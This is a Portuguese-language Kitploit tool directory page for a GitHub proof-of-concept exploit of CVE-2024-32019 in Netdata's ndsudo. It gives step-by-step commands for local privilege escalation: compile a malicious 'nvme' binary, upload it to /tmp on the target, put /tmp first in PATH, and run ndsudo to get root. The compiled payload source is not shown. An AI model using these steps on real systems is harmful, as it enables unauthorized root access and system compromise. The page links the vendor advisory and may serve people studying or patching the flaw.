Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-32019-POC — POC para a vulnerabilidade netdata ndsudo - CVE-2024-32019 | Kitploit
Ferramentas/GitHubGitHub/azureadtrent/cve-2024-32019-poc
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoExploração de Binários
GitHubazureadtrent/cve-2024-32019-poc

CVE-2024-32019-POC

POC para a vulnerabilidade netdata ndsudo - CVE-2024-32019

Ver Repositório
212há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Escalação de Privilégios via ndsudo (Exploit Local do Netdata)

Este POC é usado para explorar um utilitário vulnerável ndsudo empacotado com o Netdata para escalar privilégios locais para root. O exploit funciona injetando um binário malicioso no PATH do usuário que se passa por um comando confiável (nvme) e é executado com privilégios de root pelo ndsudo.


Pré-requisitos e Suposições

  • Você tem acesso local ao shell no sistema alvo.

  • Você pode executar o seguinte comando, mas ele falha com um erro "não encontrado" ou similar:

    root@kitploit:~
    ./ndsudo nvme-list
    

1. Compile a Carga Maliciosa

Na sua máquina atacante (ou no sistema vulnerável se tiver um compilador), compile o binário (por exemplo, a partir do arquivo poc.c no repositório):

root@kitploit:~
gcc poc.c -o nvme

Este binário deve ser criado para gerar um shell root ou executar comandos arbitrários com privilégios de root.


2. Transfira a Carga para o Sistema Alvo

Mova ou faça upload do binário nvme compilado para um diretório gravável pelo seu usuário, como /tmp:

root@kitploit:~
scp nvme user@target:/tmp/
# or use any file upload method you have

3. Prepare a Carga para Execução

No sistema alvo, certifique-se de que o binário seja executável e adicione seu diretório ao início do seu PATH:

root@kitploit:~
chmod +x /tmp/nvme
export PATH=/tmp:$PATH

Isso garante que o ndsudo resolverá e executará seu nvme malicioso em vez do legítimo.


4. Acione o ndsudo para Executar Sua Carga

Execute o comando vulnerável para acionar o ndsudo:

root@kitploit:~
./ndsudo nvme-list

Recursos

  • Aviso do Github do Netdata: https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
Baixar ferramenta